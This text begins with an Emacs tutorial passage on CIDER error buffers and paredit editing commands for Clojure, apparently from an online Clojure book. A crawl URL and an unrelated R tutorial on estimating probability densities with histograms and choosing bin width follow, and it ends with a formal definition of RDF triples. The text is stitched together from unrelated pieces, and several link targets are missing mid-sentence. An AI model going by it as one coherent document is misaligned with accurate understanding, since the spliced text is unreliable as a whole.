*cider-error* buffer has the filters Clojure, Java, REPL, Tooling, Duplicates, and All. You can click each option to activate that filter. You can also click each stack trace line to jump to the corresponding source code.
Here’s how to close the stack trace in the left window:
- Use C-x o to switch to the window.
- Press q to close the stack trace and go back to CIDER.
If you want to view the error again, you can switch to the
*cider-error* buffer. You can also get error messages when trying to compile files. To see this, go to the core.clj buffer, write some buggy code, and compile:
- Add
(map)to the end.
- Use C-c C-k to compile.
You should see a
*cider-error* buffer similar to the one you saw earlier. Again, press q to close the stack trace.
Paredit
While writing code in the Clojure buffer, you may have noticed some unexpected things happening. For example, every time you type a left parenthesis, a right parenthesis immediately gets inserted.
This occurs thanks to paredit-mode, a minor mode that turns Lisp’s profusion of parentheses from a liability into an asset. Paredit ensures that all parentheses, double quotes, and brackets are closed, relieving you of that odious burden.
Paredit also offers key bindings to easily navigate and alter the structure created by all those parentheses. In the next section, I’ll go over the most useful key bindings, but you can also check out a comprehensive cheat sheet at(in the cheat sheet, the red pipe represents point).
However, if you’re not used to it, paredit can sometimes be annoying. I think it’s more than worth your while to take some time to learn it, but you can always disable it with M-x paredit-mode, which toggles the mode on and off.
The following section shows you the most useful key bindings.
Wrapping and Slurping
Wrapping surrounds the expression after point with parentheses. Slurping moves a closing parenthesis to include the next expression to the right. For example, say we start with this:
(+ 1 2 3 4)
and we want to get this:
(+ 1 (* 2 3) 4)
We can wrap the
2, add an asterisk, and then slurp the
3. First, place point, which is represented here as a vertical pipe,
|:
(+ 1 |2 3 4)
Then type M-(, the binding for paredit-wrap-round, getting this result:
(+ 1 (|2) 3 4)
Add the asterisk and a space:
(+ 1 (* |2) 3 4)
To slurp in the
3, press C-→:
(+ 1 (* |2 3) 4)
This makes it easy to add and extend parentheses without wasting precious moments holding down arrow keys to move point.
Barfing
Suppose, in the preceding example, you accidentally slurped the four. To unslurp it (also known as barfing), place your cursor (
|) anywhere in the inner parentheses:
(+ 1 (|* 2 3 4))
Then use C-←:
(+ 1 (|* 2 3) 4)
Ta-da! Now you know how to expand and contract parentheses at will.
Navigation
Often when writing in a Lisp dialect, you’ll work with expressions like this:
(map (comp record first) (d/q '[:find ?post :in $ ?search :where [(fulltext $ :post/content ?search) [[?post ?content]]]] (db/db) (:q params)))
With this kind of expression, it’s useful to jump quickly from one subexpression to the next. If you put point right before an opening parenthesis, C-M-f will take you to the closing parenthesis. Similarly, if point is right after a closing parenthesis, C-M-b will take you to the opening parenthesis.
Table 2-8 summarizes the paredit key bindings you just learned.
- Table 2-8: Paredit Key Bindings
Continue Learning
Emacs is one of the longest-lived editors, and its adherents often approach fanaticism in their enthusiasm for it. It can be awkward to use at first, but stick with it and you will be amply rewarded over your lifetime.
Whenever I open Emacs, I feel inspired. Like a craftsman entering his workshop, I feel a realm of possibility open before me. I feel the comfort of an environment that has evolved over time to fit me perfectly—an assortment of packages and key bindings that help me bring ideas to life day after day.
These resources will help you as you continue on your Emacs journey:
- The Emacs Manual provides excellent, comprehensive instructions. Spend some time with it every morning! Download the PDF and read it on the go:.
- The Emacs Reference Card is a handy cheat sheet:.
- Mastering Emacs by Mickey Petersen is one of the best Emacs resources available. Start with the reading guide:.
- For the more visually minded folks, I recommend the hand-drawn “How to Learn Emacs: A Beginner’s Guide to Emacs 24 or Later” by Sacha Chua:.
- Just press C-h t for the built-in tutorial.
Summary
Whew! You’ve covered a lot of ground. You now know about Emacs’s true nature as a Lisp interpreter. Key bindings act as shortcuts to execute elisp functions, and modes are collections of key bindings and functions. You learned how to interact with Emacs on its own terms and mastered buffers, windows, regions, killing, and yanking. Finally, you learned how to easily work with Clojure using CIDER and paredit.
With all of this hard-won Emacs knowledge under your belt, it’s time to start learning Clojure in earnest!
|
https://www.braveclojure.com/basic-emacs/
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
A.
To use this plugin, add
system_setting as a dependency in your pubspec.yaml file.
For iOS,
SettingTarget will not have any effect. It will always go to app setting.
import 'package:flutter/material.dart'; import 'packages:system_setting/system_setting.dart'; void main() => runApp(MaterialApp( home: Scaffold( body: Center( child: RaisedButton( onPressed: _jumpToSetting, child: Text('Goto setting'), ), ), ), )); _jumpToSetting() { SystemSetting.goto(SettingTarget.WIFI); }
##0.1.2
Documentation update
##0.1.1
Add support for iOS.
Add support for jumping to app-specific setting in Android.
Initial release.
example/README.md
Demonstrates how to use the system_setting plugin.
For help getting started with Flutter, view our online documentation.
Add this to your package's pubspec.yaml file:
dependencies: system_setting: ^0.1.2
You can install packages from the command line:
with Flutter:
$ flutter packages get
Alternatively, your editor might support
flutter packages get.
Check the docs for your editor to learn more.
Now in your Dart code, you can use:
import 'package:system_setting/system_setting.
|
https://pub.dartlang.org/packages/system_setting
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
How to Calculate Levenshtein Distance in Java?
Last modified: November 3, 2018
1. Introduction
In this article, we describe the Levenshtein distance, alternatively known as the Edit distance. The algorithm explained here was devised by a Russian scientist, Vladimir Levenshtein, in 1965.
We’ll provide an iterative and a recursive Java implementation of this algorithm.
2. What is the Levenshtein Distance?
The Levenshtein distance is a measure of dissimilarity between two Strings. Mathematically, given two Strings x and y, the distance measures the minimum number of character edits required to transform x into y.
Typically three type of edits are allowed:
- Insertion of a character c
- Deletion of a character c
- Substitution of a character c with c‘
Example: If x = ‘shot’ and y = ‘spot’, the edit distance between the two is 1 because ‘shot’ can be converted to ‘spot’ by substituting ‘h‘ to ‘p‘.
In certain sub-classes of the problem, the cost associated with each type of edit may be different.
For example, less cost for substitution with a character located nearby on the keyboard and more cost otherwise. For simplicity, we’ll consider all costs to be equal in this article.
Some of the applications of edit distance are:
- Spell Checkers – detecting spelling errors in text and find the closest correct spelling in dictionary
- Plagiarism Detection (refer – IEEE Paper)
- DNA Analysis – finding similarity between two sequences
- Speech Recognition (refer – Microsoft Research)
3. Algorithm Formulation
Let’s take two Strings x and y of lengths m and n respectively. We can denote each String as x[1:m] and y[1:n].
We know that at the end of the transformation, both Strings will be of equal length and have matching characters at each position. So, if we consider the first character of each String, we’ve got three options:
- Substitution:
- Determine the cost (D1) of substituting x[1] with y[1]. The cost of this step would be zero if both characters are same. If not, then the cost would be one
- After step 1.1, we know that both Strings start with the same character. Hence the total cost would now be the sum of the cost of step 1.1 and the cost of transforming the rest of the String x[2:m] into y[2:n]
- Insertion:
- Insert a character in x to match the first character in y, the cost of this step would be one
- After 2.1, we have processed one character from y. Hence the total cost would now be the sum of the cost of step 2.1 (i.e., 1) and the cost of transforming the full x[1:m] to remaining y (y[2:n])
- Deletion:
- Delete the first character from x, the cost of this step would be one
- After 3.1, we have processed one character from x, but the full y remains to be processed. The total cost would be the sum of the cost of 3.1 (i.e., 1) and the cost of transforming remaining x to the full y
The next part of the solution is to figure out which option to choose out of these three. Since we do not know which option would lead to minimum cost at the end, we must try all options and choose the best one.
4. Naive Recursive Implementation
We can see that the second step of each option in section #3 is mostly the same edit distance problem but on sub-strings of the original Strings. This means after each iteration we end up with the same problem but with smaller Strings.
This observation is the key to formulate a recursive algorithm. The recurrence relation can be defined as:
D(x[1:m], y[1:n]) = min {
D(x[2:m], y[2:n]) + Cost of Replacing x[1] to y[1],
D(x[1:m], y[2:n]) + 1,
D(x[2:m], y[1:n]) + 1
}
We must also define base cases for our recursive algorithm, which in our case is when one or both Strings become empty:
- When both Strings are empty, then the distance between them is zero
- When one of the Strings is empty, then the edit distance between them is the length of the other String, as we need that many numbers of insertions/deletions to transform one into the other:
- Example: if one String is “dog” and other String is “” (empty), we need either three insertions in empty String to make it “dog”, or we need three deletions in “dog” to make it empty. Hence the edit distance between them is 3
A naive recursive implementation of this algorithm:
public class EditDistanceRecursive { static int calculate(String x, String y) { if (x.isEmpty()) { return y.length(); } if (y.isEmpty()) { return x.length(); } int substitution = calculate(x.substring(1), y.substring(1)) + costOfSubstitution(x.charAt(0), y.charAt(0)); int insertion = calculate(x, y.substring(1)) + 1; int deletion = calculate(x.substring(1), y) + 1; return min(substitution, insertion, deletion); } public static int costOfSubstitution(char a, char b) { return a == b ? 0 : 1; } public static int min(int... numbers) { return Arrays.stream(numbers) .min().orElse(Integer.MAX_VALUE); } }
This algorithm has the exponential complexity. At each step, we branch-off into three recursive calls, building an O(3^n) complexity.
In the next section, we’ll see how to improve upon this.
5. Dynamic Programming Approach
On analyzing the recursive calls, we observe that the arguments for sub-problems are suffixes of the original Strings. This means there can only be m*n unique recursive calls (where m and n are a number of suffixes of x and y). Hence the complexity of the optimal solution should be quadratic, O(m*n).
Lets look at some of the sub-problems (according to recurrence relation defined in section #4):
- Sub-problems of D(x[1:m], y[1:n]) are D(x[2:m], y[2:n]), D(x[1:m], y[2:n]) and D(x[2:m], y[1:n])
- Sub-problems of D(x[1:m], y[2:n]) are D(x[2:m], y[3:n]), D(x[1:m], y[3:n]) and D(x[2:m], y[2:n])
- Sub-problems of D(x[2:m], y[1:n]) are D(x[3:m], y[2:n]), D(x[2:m], y[2:n]) and D(x[3:m], y[1:n])
In all three cases, one of the sub-problems is D(x[2:m], y[2:n]). Instead of calculating this three times like we do in the naive implementation, we can calculate this once and reuse the result whenever needed again.
This problem has a lot of overlapping sub-problems, but if we know the solution to the sub-problems, we can easily find the answer to the original problem. Therefore, we have both of the properties needed for formulating a dynamic programming solution, i.e., Overlapping Sub-Problems and Optimal Substructure.
We can optimize the naive implementation by introducing memoization, i.e., store the result of the sub-problems in an array and reuse the cached results.
Alternatively, we can also implement this iteratively by using a table based approach:
static int calculate(String x, String y) { int[][] dp = new int[x.length() + 1][y.length() + 1]; for (int i = 0; i <= x.length(); i++) { for (int j = 0; j <= y.length(); j++) { if (i == 0) { dp[i][j] = j; } else if (j == 0) { dp[i][j] = i; } else { dp[i][j] = min(dp[i - 1][j - 1] + costOfSubstitution(x.charAt(i - 1), y.charAt(j - 1)), dp[i - 1][j] + 1, dp[i][j - 1] + 1); } } } return dp[x.length()][y.length()]; }
This algorithm performs significantly better than the recursive implementation. However, it involves significant memory consumption.
This can further be optimized by observing that we only need the value of three adjacent cells in the table to find the value of the current cell.
6. Conclusion
In this article, we described what is Levenshtein distance and how it can be calculated using a recursive and a dynamic-programming based approach.
Levenshtein distance is only one of the measures of string similarity, some of the other metrics are Cosine Similarity (which uses a token-based approach and considers the strings as vectors), Dice Coefficient, etc.
As always the full implementation of examples can be found over on GitHub.
|
https://www.baeldung.com/java-levenshtein-distance
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
The deductibility of a deceased individual’s losses from investments in oil and gas partnerships, and the Tax Department’s ability to assess income tax after the three-year statute of limitations has closed, is the subject of an interesting recent decision by a New York State Administrative Law Judge. The decision addresses whether the taxpayer filed false or fraudulent returns (for which there is no statute of limitations) and whether the deficiency was attributable to an “abusive tax avoidance transaction” (for which there is a six-year statute of limitations). Matter of Richard Siegal (Estate of), Gail Siegal, Administrator, DTA Nos. 826661 & 826750 (N.Y.S. Div. of Tax App., Feb. 15, 2018).
Facts. Richard Siegal (now deceased) was a New York resident during the tax years 2001 and 2002. He had been involved in the oil and gas industry since the 1970s and created partnerships to participate in oil and gas ventures. For the years in issue, he was a general partner in several oil and gas partnerships that generated losses, principally through the deduction of intangible drilling costs. The taxpayer reported his distributive shares of those losses for both federal and New York State personal income tax (“PIT”) purposes. In 2003, following an audit of those partnerships by the Department’s Tax Shelter Unit for the years 2000 and 2001, the Department concluded its audit without adjustment and notified the taxpayer that no further action was required with respect to his New York State returns.
In 2005, the Department’s Field Audit Bureau commenced an audit of the taxpayer’s PIT returns, initially for the years 2002 through 2004, and later expanded to include 2001, primarily relating to his claimed losses from the oil and gas partnerships. The Department’s Tax Shelter Unit informed the Field Audit Bureau that there were other audit cases involving the same partnerships, and that the partnerships “might be questionable.” The three-year statute of limitations for assessment had already expired for 2001, but the Field Audit Bureau took the position that the six-year statute of limitations for understatements attributable to tax shelter activity was instead applicable. With that six-year period about to expire for the 2001 tax year, the Department issued a notice of deficiency (“Notice”) based on the disallowance of the taxpayer’s losses from the partnerships. A separate Notice was issued asserting a fraud penalty based on the taxpayer’s alleged failure to participate in a 2005 New York State voluntary compliance initiative.
In 2013, while the Notice for 2001 was being contested at the Department’s Conciliation Bureau, the Department issued a Notice for 2002, also based in the disallowance of the partnership losses, and also asserting a penalty for failure to participate in the 2005 voluntary compliance initiative. Both the three-year and six-year statute of limitations for the 2002 year had expired, but the Department took the position that the taxpayer’s returns were false or fraudulent and it claimed that therefore no statute of limitations was applicable. It is unclear from the decision when and on what basis the initial fraud determination was made, but the Department’s auditor testified that the fraud determination was made by the Department’s Office of Counsel. The taxpayer’s estate maintained that the Notices were time-barred.
The decision — which is 74 pages long — goes into considerable detail regarding the nature of the oil and gas industry, including drilling risks and drilling contract types, as well as the taxpayer’s cash and subscription note investments in those partnerships, all of which is beyond the scope of this article (although it is recommended reading for learning about the industry). The decision discusses the fact that the oil and gas partnerships entered into “turnkey drilling arrangements.” Under this common arrangement, a turnkey driller accepts a fixed fee to develop the oil and gas wells and runs the considerable risk of cost overruns. As a result, turnkey contracts are more costly to investors.
More than half of the wells drilled by the partnerships generated hundreds of millions of dollars of oil and gas revenues. However, they were all designed to be eligible to deduct intangible drilling costs in the first year of operation. The taxpayer’s finance and valuation expert testified at the hearing that the three principal purposes for investing in oil and gas ventures — potential profit, portfolio diversification, and tax benefits — were all present here. The taxpayer’s oil and gas expert testified that the terms of the turnkey drilling contracts were reasonable relative to industry standards. The Department’s petroleum engineer expert testified that the industry-standard mark-up for turnkey drilling contracts was 10-25% above drilling costs, far less than the mark-ups in question, which were paid to drilling companies controlled by the taxpayer. However, the Department’s expert admitted that he had limited experience evaluating turnkey contracts, and he made several concessions regarding the limited scope of his research.
Law. As relevant here, there are two exceptions to the three-year statute of limitations. First, the tax may be assessed at any time if a “false or fraudulent return” is filed “with intent to evade tax.” Tax Law § 683(c)(1)(B). The limitation period is extended to six years “if the deficiency is attributable to an abusive tax avoidance transaction.” Tax Law § 683(c)(11)(B). The Department bears the burden of proving that the taxpayer filed a false or fraudulent return (here, for the 2002 tax year). On the other hand, the taxpayer bears the burden of proof to rebut an assertion of an abusive tax avoidance transaction (for the 2001 tax year).
ALJ determination. The ALJ first concluded that for 2002 the Department did not meet its burden of proof to show that the taxpayer filed a false or fraudulent return through “clear, definite and unmistakable evidence of every element of fraud.” The ALJ found that the Department’s “asserted basis for finding fraud has been fluid and inconsistent throughout the proceedings herein,” and she did not find the testimony of the Department’s expert to be “compelling.” Moreover, the ALJ rejected the claim made in the Department’s post-hearing brief that the taxpayer promoted abusive tax shelters, noting that the assertion was not at issue at the hearing.
As for whether the taxpayer’s investments in the oil and gas partnerships were abusive tax avoidance transactions triggering a six-year statute of limitations, the test was whether the taxpayer proved that his investments were not “for the principal purpose of avoiding tax.” The ALJ found that the taxpayer met his burden for some, but not all, of the partnerships. The critical difference among them was that for some partnerships the subscription note for the taxpayer’s partnership investment was shown to be genuine debt but for other partnerships similar proof was not provided.
The ALJ distinguished Matter of Sznajderman, DTA No. 824235 (N.Y.S. Tax App. Trib., July 11, 2016), appeal to 3rd Dep’t pending, where the Tribunal upheld the Department’s reliance on the six-year statute of limitations for abusive tax avoidance transactions in a case involving some of the same oil and gas partnerships as were involved here, and for one of the same tax years. The ALJ found that the “lynchpin” of that decision — that the investor’s subscription note obligation representing his investment in the partnership lacked “economic reality” — was not present in this case, and she ruled that the Department’s reliance on Sznajderman was misplaced.
For two of the partnerships for which the taxpayer did not meet his burden of proof regarding tax avoidance, however, the ALJ found that the Department lacked a rational basis for disallowing the taxpayer’s share of losses, noting that the Department did not explain the reason for disallowing losses resulting from the taxpayer’s cash-only investments in those partnerships.
Finally, for the disallowed losses that were found to be timely asserted, the ALJ upheld the imposition of penalties for the taxpayer’s failure to participate in the 2005 New York State voluntary compliance initiative, noting that there are no provisions in the Tax Law for the abatement of such penalties.
ADDITIONAL INSIGHTS
The Department’s claim that the taxpayer’s 2002 return was false or fraudulent return seems particularly tenuous, and the ALJ provides a thorough analysis of why the Department did not meet its considerable burden of proof as to fraud. While the tax benefits of investing in an oil and gas partnership invite scrutiny, there was scant evidence that the taxpayer’s income tax returns were false or fraudulent.
The question of whether the taxpayer’s investments constituted abusive tax avoidance transactions (thereby permitting a six-year statute of limitations for 2001) was less clear cut, as evidenced by the ALJ’s fact-intensive analysis for why the taxpayer met his burden of proof as to some partnerships but not as to others. While Sznajderman involved similar facts and issues, the ALJ found that the decision was not determinative because of the crucial differences regarding the economic substance of the respective taxpayers’ subscription notes for their investments.
It is interesting that while it appears that the Department and the IRS cooperated on their audits of the oil and gas partnerships, and the IRS did not propose any adjustments, the ALJ did not reference that fact in the ALJ’s conclusion.
Both this decision and the decision in Matter of Steuben Delshah, LLC (discussed in the preceding article) illustrate the significant evidentiary hurdles that the New York State and City tax departments must meet in order to disregard the statute of limitations by proving that the taxpayer filed a false or fraudulent return with willful intent to evade tax.
|
https://www.lexology.com/library/detail.aspx?g=f168d1ca-6439-45bb-aee3-9165b8f7aac9
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
import vtk
import numpy as np
from itertools import product as itprod
vertices = np.array(list(itprod([0, 1], repeat=3)))
print vertices.shape[0] //8 vertices
print vertices.shape[1] //3 coordinates x-y-z
array = vtk.vtkFloatArray()
array.SetNumberOfComponents(vertices.shape[1])
array.SetNumberOfTuples(vertices.shape[0])
print array // number of tuples is 8, number of components is 3 OK
array = vtk.vtkFloatArray()
array.SetNumberOfTuples(vertices.shape[0])
array.SetNumberOfComponents(vertices.shape[1])
print array // number of tuples is 2 number of components is 3 WRONG
VTK is always a fickle thing, especially when it comes to documentation. I found some information on
SetNumberOfTuples and
SetNumberOfComponents at the corresponding links.
The former (
SetNumberOfTuples):
Set the number of tuples (a component group) in the array.
Note that this may allocate space depending on the number of components. [...]
The latter (
SetNumberOfComponents):
Set/Get the dimension (n) of the components.
Must be >= 1. Make sure that this is set before allocation.
As I see it, the former may allocate space, but the latter has to be called before any allocation. So, they indeed do not commute, you need to call the latter first, and that should be the working order (which is in line with your results).
The links obviously don't correspond to the python implementation, but the fact that the C++ version is not supposed to commute, you should not expect commutativity in python either.
|
https://codedump.io/share/WwUDV8XvIAXe/1/vtkpython-vtkfloatarray-setters-for-tuple-and-component-don39t-commute
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
Stephen Toub: Task-Based Asynchrony with Async
.
Actual format may change based on video formats available and browser capability. VB.netters berate Microsoft
with now.
mmm.
Yes
Unsafe? No
I think Extension Custom Operators would be interesting.
These custom operator have no precedence, so you need to use ( )'s accomplish it.
Public Operators Ops_Double ' A Simple one Roots.' <Extension()> Public Operator /¯ (ByVal x As Double, ByVal y As Double) As Double ' Inside here the usage of /¯ is an Error ' ' Error is Infinite Recursion ' If x =0 Then Throw New AttemptToDivideByZero() Return y^(1/x) End Operator End Operators.
Using Operator From {namespace} Dim r as Double = 3 /¯ 27 ' r = 3 ( The cube root )' End.
8 hours ago, exoteric wrote
This is a stellar going deep! Lucian is a great presenter.
Agreed. I'd like to get Lucian on C9 again. He's super bright and articuate!
C
I agree we need more Lucian.
Possible one of the most useful benefits of having Iterators.
<Runtime.CompilerServices.Extension()> Public Iterator Function AsEnumerable(ByVal f As IEnumerator) As IEnumerable f.Reset() While f.MoveNext Yield f.Current End While f.Reset() End Function
using (var writer = StreamWriter(dialog.OpenFile())) { WriteResults(writer, dialog.FilterIndex) } async void WriteResults(StreamWriter writer, int whatToExport) { if (whatToExport is something that isn't computed) { await TaskEx.Run(() => Compute(...)) } // write the result here // Raises an exception, that the stream is closed }
using (var x = ...) { SomeAsyncMethod(x); }
are used?
Lucian was excellent!!! I didn't get lost in translation LOL!!! He is so right about that everyone has the misconception of Async = background process
Great job Lucian !!
Lucian kicks * ! <a href=”">tigara electronica</a>
Comments have been closed since this content was published more than 30 days ago, but if you'd like to continue the conversation, please create a new thread in our Forums, or Contact Us and let us know.
|
https://channel9.msdn.com/Shows/Going+Deep/Lucian-Wischik-Inside-VBNET-Async?format=flash
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
Probability Density Functions (PDFs) describe probability of observing some continuous random variable in some region of space. For one dimensional random variable X, recall that PDF f(x) follows the properties that
Probability that variable takes values between
Probability that variable takes values exactly equal to
Estimating such PDF from sample of observations is common problem in Machine Learning. This comes handy in many outlier detection algorithms where we seek to estimate “true” distribution based on sample observations and then classify some of existing or new observations as outlier or not. For instance, an auto-insurer interested in catching fraud might examine claim amount request for each type of body-work, say, bumper replacement, and mark for potential fraud any amount which is too high. By way of another example, a child psychologist may examine time taken to complete a given task across different children and mark those children who take too long or too short a time for potential investigation.
In this blog post, we discuss how can we learn the PDF from sample of observations, so that we can calculate probability for each observation and decide if it is common or rare occurrence.
First we generate some random data for demonstration.
set.seed(123)
data <- c(rnorm(200, 10, 20), rnorm(200, 60, 30), runif(200, 120, 180)) # 600 points
Next, we visualize them for our understanding, using histogram, as in Figure 1.
# Plot 1
hist(data, breaks=50, freq=F, main="Univariate Distribution", xlab="Data Value")
# Plot 2
hist(data, breaks=20, freq=F, main="", xlab="20 Data Bins", col='red', border='red')
par(new=T)
hist(data, breaks=100, freq=F, main="Univariate Distribution", xlab=NULL, xaxt='n', yaxt='n')
Figure 1 – Data Visualization using 50-Bin Histogram
While histograms are charts for data visualization, you can also see that they are our first estimate of density. More specifically, we can estimate density by dividing data into bins and assuming that density is constant within that bin range and has value equal to number of observations falling into that bin as proportion of total number of observations
Hence, estimated PDF is
And you realize that you have made assumption about bin-width which will impact density estimate. Hence bin-width is a parameter to density estimation model using histogram. However, overlooked fact is that we also are working with one more parameter – which is the starting position of first bin. You can see how that may affect density estimations for all bins. To see impact of bin-width, Figure 2 overlays density estimates with 20-bin and 100-bin histograms. Look at encircled region, where fewer/coarser bins give flat density estimate, while many/finer bins give varying density estimate. For yellow point, density estimates will range from 0.004 to 0.008 from two different models.
Thus, selecting parameters right is crucial to get the density estimation right. We will get to that, but note that there are also other problems with histograms. Density estimates using histograms are quite jerky and discontinuous. Density is flat for a bin and then suddenly changes drastically for a point infinitesimally outside the bin. This makes consequence of wrong estimate even worse for practical problems.
Lastly, we have been working with single dimensional variable for ease of illustration, but in practice most problems are multi-dimensions. Since number of bins grow exponentially with number of dimensions, number of observations required to estimate the density also grow. In fact, it is plausible that despite having millions of observations, many bins remain empty or contain single digit observations. With just 50 bins each in just 3 dimensions, we have 503=125000 cells which needs to be populated. That comes about average of 8 observations per cell, assuming uniform distribution, a million observation training data.
For bin-width n number of observations N for bin J proportion of observations is
and density estimate is
Statistical theory proves that while f(x) is expected value of density in the bin, variance of density is
While we can get better density estimate by reducing bin-width n , we increase variance of estimation, as we can intuitively feel about too fine bin-width. We can use leave one-out cross-validation technique to estimate optimal set of parameters. We can estimate density using all observations but one, and then compute density of that left out observation and measure error in estimation. Solving this mathematically for histograms gives a closed form solution for loss function for given bin-width.
where m is number of bins. Technical details of above are in this lecture . We can plot this loss function for various numbers of bins (Figure 3)
getLoss <- function(n.break) {
N <- 600
res <- hist(data, breaks=n.break, freq=F)
bin <- as.numeric(res$breaks)
h <- bin[2]-bin[1]
p <- res$density
p <- p * h
return ( 2/(h*(N-1)) - ( (N+1)/(h*(N-1))*sum(p*p) ) )
}
loss.func <- data.frame(n=1:600)
loss.func$J <- sapply(loss.func$n, function(x) getLoss(x))
# Plot 3
plot(loss.func$n, loss.func$J, col='red', type='l')
opt.break <- max(loss.func[loss.func$J == min(loss.func$J), 'n'])
print(opt.break)
# Plot 4
hist(data, breaks=opt.break, freq=F, main="Univariate Distribution", xlab="15 Data Bins")
and get optimal number as 15. Actually anything from 8-15 is fine.
Consequently, below Figure 4 is density estimation which balances density values as well granularity (with optimal bias-variance tradeoff).
If you feel little uneasy at this point then I am with you. Even though, number of bins is mathematically optimal, it feels too coarse a estimation. There is no intuitive feeling why we have done the best job. And not to forget other concerns about starting position, discontinuous estimation, and curse of dimensionality . Dispair not, there is a better way. In next post we will talk about Density Estimation using Kernels..
|
http://www.edupristine.com/blog/density-estimation-using-histograms
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
The following form allows you to view linux man pages.
#include <math.h>
double tan(double x);
float tanf(float x);
long double tanl(long double x);
Link with -l radi-
ans..
Multithreading (see pthreads(7))
The tan(), tanf(), and tanl() functions are thread-safe.
C99, POSIX.1-2001. The variant returning double also conforms to SVr4,
4.3BSD, C89.
webmaster@linuxguruz.com
|
http://www.linuxguruz.com/man-pages/tanl/
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
Red Hat Bugzilla – Bug 23221
up2date fails on run, AttributeError: Up2dateConfig (wrong config is read)
Last modified: 2015-01-07 18:42:41 EST
up2date consistently fails to run on RH 62.
up2date version:
Name : up2date Relocations: (not relocateable)
Version : 2.1.7 Vendor: Red Hat, Inc.
Release : 0.6.x Build Date: Thu 21 Dec 2000
08:25:52 PM IST
Install date: Tue 02 Jan 2001 09:29:25 PM IST Build Host:
porky.devel.redhat.com
Group : System Environment/Base Source RPM:
up2date-2.1.7-0.6.x.src.rpm
Size : 219264 License: GPL
Packager : Red Hat, Inc. <>
Summary : Automatically update RPMs for a Red Hat Linux Systemrequires
Description :
Errors are from any utility that uses up2date configs, like:
Traceback (innermost last):
File "/usr/sbin/up2date-config", line 312, in ?
main()
File "/usr/sbin/up2date-config", line 307, in main
gui = Gui()
File "/usr/sbin/up2date-config", line 55, in __init__
self.cfg = config.Up2dateConfig()
AttributeError: Up2dateConfig
and same error from up2date. Seems to be because python
(python-1.5.2-27.6.x) also has config.py and the script includes that
config.py instead of up2date's. If I change config to config2 in every
place in up2date (imports and config.Up2dateConfig()), it works.
that shouldn't matter. Works fine on my RHL 6.2 box.
Can I see the output of:
rpm -V up2date
rpm -V up2date-gnome
rpm -V python
rpm -V up2date
SM?....T c /etc/sysconfig/rhn/up2date
missing /usr/share/rhn/up2date/config.pyc
S.5....T /usr/share/rhn/up2date/translate.pyc
S.5....T /usr/share/rhn/up2date/up2date.py
SM5....T /usr/share/rhn/up2date/up2date.pyc
rpm -V up2date-gnome
S.5....T /usr/sbin/up2date-config
S.5....T /usr/share/rhn/up2date/checklist.pyc
S.5....T /usr/share/rhn/up2date/configdlg.py
S.5....T /usr/share/rhn/up2date/configdlg.pyc
S.5....T /usr/share/rhn/up2date/gui.pyc
S.5....T /usr/share/rhn/up2date/progress.pyc
rpm -V python
did not produce any output
Assigned QA to jturner
You are missing the compiled up2date python config class:
missing /usr/share/rhn/up2date/config.pyc
Doh.
Yes, it is missing, because *I had to remove it to make it run*.
OK, seems I did not make myself clear.
Python has config. up2date has config. When up2date uses "config" it thinks it's
config for up2date, but apparently it's config for python. If I change every
reference of config to config2, it works. I'm not sure if removing config.pyc
necessary to make it run, but renaming was necessary. I guess these two lines
are the cause:
sys.path.append("/usr/share/rhn/up2date/")
import config
I'm not a big Python pro, but I imply that if you append directory to the path,
it is searched after all others? And if some previous path has config, the
import will be taken from there? Am I wrong?
Look:
Something is _different_ about your system than ANY other Red Hat Linux system
out there. I'm not sure what, but something. We don't have this problem on any
of our test boxes. THOUSANDS of other people are using up2date without this
issue.
This config class you speak of that python has -- we don't ship any "config.py"
class with python by default. so you have added something to your system.
More info.
[pbrown@xanadu pbrown]$ rpm -q python
python-1.5.2-27.6.x
[pbrown@xanadu pbrown]$ rpm -V python
[pbrown@xanadu pbrown]$ rpm -ql python | grep config
[pbrown@xanadu pbrown]$ rpm -ql python |grep config
[pbrown@xanadu pbrown]$
|
https://bugzilla.redhat.com/show_bug.cgi?id=23221
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
MooseX::Role::Restricted - (DEPRECATED) Restrict which sub are exported by a role
package MyApp::MyRole; use MooseX::Role::Restricted; sub method1 { ... } sub _private1 { ... } sub _method2 :Public { ... } sub private2 :Private { ... }
This module is no longer supported. I suggest looking at namespace::autoclean as an alternative. In its default form MooseX::Role::Restricted simple excludes ann sub with names starting with
_ to be excluded. This can be accomplished using
use namespace::autoclean -also => qr/^_/;
If you are using
lazy_build or other Moose features that require the use of
_ prefixed methods make sure to change the pattern to not match those. Or use some other prefix, for example a double
_, for your private subs that you do not want included in the role.
By default Moose::Role will export any sub you define in a role package. However it does not export any sub which was imported from another package
MooseX::Role::Restricted give a little more control over which subs are exported and which are not.
By default an sub with a name starting with
_ is considered private and will not be exported. However MooseX::Role::Restricted provides two subroutine attributes
:Public and
:Private which can control is any sub is exported or kept private
Graham Barr <gbarr@cpan.org>
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
|
http://search.cpan.org/~gbarr/MooseX-Role-Restricted-1.03/lib/MooseX/Role/Restricted.pm
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
The RDF data model [7] represents information as sets of statements, which can be visualized as node-and-arc-labeled directed graphs. The data model is designed for the integrated representation of information that originates from multiple sources, is heterogeneously structured, and is represented using different schemata. RDF can be viewed as a lingua franca, capable of moderating between other data models that are used on the Web.
In RDF, information is represented in statements, called RDF triples. The three parts of each triple are called its subject, predicate, and object. A triple mimics the basic structure of a simple sentence, such as for example:
Burkhard Jung
is the mayor of
Leipzig
(subject)
(predicate)
(object)
The following is the formal definition of RDF triples as it can be found in the W3C RDF standard [7].
Definition 1 (RDF Triple). Assume there are pairwise disjoint infinite sets I, B, and L representing IRIs, blank nodes, and RDF literals, respectively. A triple (v1, v2, v3) ∈ (I ∪ B) × I × (I ∪ B ∪ L) is called an RDF triple. In this tuple, v1 is the subject, v2 the predicate and v3 the object. We call T = I ∪ B ∪ L the set of RDF terms.
